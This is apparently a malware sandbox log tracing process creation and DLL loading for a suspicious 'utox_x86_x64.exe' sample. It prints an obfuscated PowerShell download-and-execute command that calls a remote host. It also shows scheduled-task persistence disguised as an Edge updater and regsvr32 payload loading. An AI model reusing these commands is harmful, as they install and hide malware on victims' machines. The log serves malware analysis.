Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe p""ow""er""s""h""ell /""W 0""1 $jufn='i'+'e'+''+'X';s""al bx1g $jufn;$ajbs50ul=bx1g(bx1g($($('(new-objecwxwl syswxwlem.newxwl.webc""lienwxwl).Dowgdvitring(''hv7i91h982d.bp24mostakp24.spacp24/tp24st.txt''.Replace(''v7i9'',''ttps://'').Replace(''p24'', ''e''))').Replace('wxwl', 't').Replace('gdvi', 'nloadS'))));exit Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\Public\ajbs50ul.bat "C:\Users\Public\ajbs50ul.bat" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\Desktop\utox_x86_x64.exe "C:\Users\user\Desktop\utox_x86_x64.exe" Jump to behavior
Source: C:\Users\Public\ajbs50ul.bat Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/miEk.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{808CCC00-48CC-4040-C488-C044888CCCC0}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)" Jump to behavior
Source: C:\Users\Public\ajbs50ul.bat Process created: C:\Windows\System32\regsvr32.exe "regsvr32" /s /i:INSTALL C:\Users\user\AppData/Roaming/miEk.ini Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\openwith.exe" Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Process created: C:\Program Files\Windows Media Player\wmpshare.exe "C:\Program Files\Windows Media Player\wmpshare.exe" Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Process created: C:\Windows\System32\rekeywiz.exe "C:\Windows\system32\rekeywiz.exe" Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Process created: C:\Windows\System32\rekeywiz.exe "C:\Windows\system32\rekeywiz.exe" Jump to behavior
Source: C:\Program Files\Windows Media Player\wmpshare.exe Process created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"
Source: C:\Windows\System32\rekeywiz.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/u0ow.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{C88C8848-C040-4888-C800-C800848C4848}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)"
Source: C:\Windows\System32\rekeywiz.exe Process created: C:\Windows\System32\regsvr32.exe "regsvr32" /s /i:INSTALL C:\Users\user\AppData/Roaming/u0ow.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\Public\ajbs50ul.bat Section loaded: userenv.dll Jump to behavior
Source: C:\Users\Public\ajbs50ul.bat Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\Public\ajbs50ul.bat Section loaded: wldp.dll Jump to behavior
Source: C:\Users\Public\ajbs50ul.bat Section loaded: profapi.dll Jump to behavior
Source: C:\Users\Public\ajbs50ul.bat Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: dataexchange.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: d3d11.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: dcomp.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: quartz.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: mmdevapi.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: devobj.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: qedit.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: msvfw32.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: dsound.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: winmmbase.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: devenum.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: msdmo.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: ksuser.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: avrt.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: audioses.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: msacm32.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: midimap.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: wudfplatform.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: devobj.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: aclayers.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc_os.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: amsi.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: wldp.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: userenv.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: profapi.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: windowscodecs.dll
Source: C:\Program Files\Windows Media Player\wmpshare.exe Section loaded: cryptbase.dll
Source: C:\Program Files\Windows Media Player\wmpshare.exe Section loaded: mswsock.dll
Source: C:\Program Files\Windows Media Player\wmpshare.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\dllhost.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\dllhost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\dllhost.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\dllhost.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: efsadu.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: mpr.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: efsutil.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: cryptui.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: mfc42u.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: netutils.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: userenv.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: vaultcli.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: credui.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: feclient.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: msimg32.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: winmm.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: wldp.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: efsadu.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: mpr.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: efsutil.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: cryptui.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: mfc42u.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: netutils.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: userenv.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: efsutil.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: vaultcli.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: credui.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: cryptui.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: feclient.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: wldp.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: profapi.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
